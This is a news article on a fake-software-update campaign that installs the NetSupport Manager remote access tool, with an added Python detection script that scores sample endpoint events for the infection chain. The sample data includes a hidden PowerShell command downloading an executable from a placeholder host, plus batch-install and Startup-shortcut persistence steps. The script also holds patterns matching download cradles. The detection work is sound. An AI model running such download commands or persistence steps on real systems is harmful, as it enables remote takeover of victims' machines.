Security researchers have identified a malicious campaign in which cyber-criminals used compromised websites to distribute malware disguised as updates to popular applications, including Adobe Flash, Chrome and Firefox. In several cases, the fake updates delivered NetSupport Manager, a legitimate remote access tool (RAT).
NetSupport Manager is a legitimate, commercially available tool that administrators use to access users' computers remotely. Attackers, however, have turned it to their own ends by installing it on victims' computers.
This function collects various system information, such as architecture, computer name, user name, processor, OS, domain, manufacturer, model, BIOS version, security solutions, MAC address, keyboard, display controller configuration, and process list. In response, the server sends a function called step3 and a file called Update.js, which in turn loads and executes the final malicious payload.
The malware also uses PowerShell commands to download files from the server, including a standalone 7zip executable file that contains a remote access tool, and a batch script for installing the NetSupport client on the system.
The script can also disable Windows error reporting and application compatibility, add the executable to the list of allowed programs, download a shortcut into the Startup folder, hide specific files, delete artifacts, and so on.
By using NetSupport Manager, attackers can gain remote access to hacked systems, launch applications, receive location data, and steal system information.
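As an added illustration (not code from the article or from any vendor quoted in it), the Python below scores constructed Sysmon-style endpoint records for the chain described above: a downloaded Update.js run by the script host, a PowerShell download, a batch installer launched from AppData, a Startup-folder shortcut, and the NetSupport client running from a user profile rather than Program Files. The record field names, the sample events and client32.exe as the name of the NetSupport client binary are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample telemetry in a Sysmon-like record shape (field names are assumptions).
SAMPLE_EVENTS = [
    {"host": "ws01", "type": "process", "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe C:\Users\bob\Downloads\Update.js", "parent": "chrome.exe"},
    {"host": "ws01", "type": "process", "parent": "wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -c (New-Object Net.WebClient).DownloadFile('http://update.example/7z.exe','C:\\Users\\bob\\AppData\\Roaming\\7z.exe')"},
    {"host": "ws01", "type": "process", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd /c C:\Users\bob\AppData\Roaming\install.bat", "parent": "powershell.exe"},
    {"host": "ws01", "type": "file",
     "path": r"C:\Users\bob\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\client.lnk"},
    {"host": "ws01", "type": "process", "parent": "cmd.exe", "cmdline": "client32.exe",
     "image": r"C:\Users\bob\AppData\Roaming\NetSupport\client32.exe"},
    {"host": "ws02", "type": "process", "parent": "services.exe", "cmdline": "client32.exe",  # benign IT install
     "image": r"C:\Program Files\NetSupport\NetSupport Manager\client32.exe"},
]

def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()

# One predicate per stage of the chain; a single hit is weak evidence (admins use these tools too).
STAGES = {
    "script_from_downloads": lambda e: e["type"] == "process"
        and _basename(e["image"]) in ("wscript.exe", "cscript.exe")
        and re.search(r"\\downloads\\\S*\.js\b", e["cmdline"], re.I) is not None,
    "powershell_download": lambda e: e["type"] == "process"
        and _basename(e["image"]) == "powershell.exe"
        and re.search(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b", e["cmdline"], re.I) is not None,
    "batch_from_appdata": lambda e: e["type"] == "process"
        and _basename(e["image"]) == "cmd.exe"
        and re.search(r"\\appdata\\\S*\.bat\b", e["cmdline"], re.I) is not None,
    "startup_shortcut": lambda e: e["type"] == "file"
        and re.search(r"\\start menu\\programs\\startup\\[^\\]+\.lnk$", e["path"], re.I) is not None,
    # client32.exe as the NetSupport client binary name is an assumption; outside Program Files is suspicious.
    "rat_in_user_profile": lambda e: e["type"] == "process"
        and _basename(e["image"]) == "client32.exe"
        and not e["image"].lower().startswith(("c:\\program files", "c:\\program files (x86)")),
}

def match_stages(events):
    # Map each host to the sorted list of distinct stages seen in its events.
    hits = defaultdict(set)
    for e in events:
        for name, pred in STAGES.items():
            if pred(e):
                hits[e["host"]].add(name)
    return {h: sorted(s) for h, s in hits.items()}

def alerts(events, min_stages=3):
    # Alert only on hosts where several distinct stages of the chain line up.
    return sorted(h for h, s in match_stages(events).items() if len(s) >= min_stages)
```

Requiring several stages on one host is what keeps the benign ws02 install (NetSupport under Program Files, started by the service manager) out of the alert list.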
“RATs are widely used for legitimate purposes, often by system administrators. However, since they are legitimate applications and readily available, malware authors can easily abuse them and sometimes can avoid user suspicion as well,” said Sudhanshu Dubey, a security researcher at FireEye.
Luke Somerville, head of special investigations at Forcepoint, told SC Media UK that the use of ‘fake updates’ is something we have been seeing for some time.
“We recently spoke about the UDPoS malware, a family which is consistently disguised as a software update to important system and administration software. Overall, the technique is probably about halfway up the clever spectrum: it's been around for quite some time and it couldn't be described as particularly innovative in modern times, but end-users are very used to seeing and accepting prompts for software updates to the point where many experience ‘update request fatigue’. Malicious actors don't need to innovate or change lure techniques when their existing tricks continue to be effective,” he said.
Barry Shteiman, director of Threat Research at Exabeam, told SC Media UK that organisations need to be able to detect unusual activity from valid machines and users, which is why behavioural analytics has grown so quickly over the last couple of years.
“While standard security technology focuses on “can you access this data?” behavioural analytics focuses on “should you be accessing this data?” – this is much more useful for detecting threats such as RATs, which can compromise entire corporate machines. Behavioural analytics is also the only way to get real insight into the insider threat. It can tell an organisation when someone is doing something that is unusual and risky, on an individual basis and compared to peers,” he said.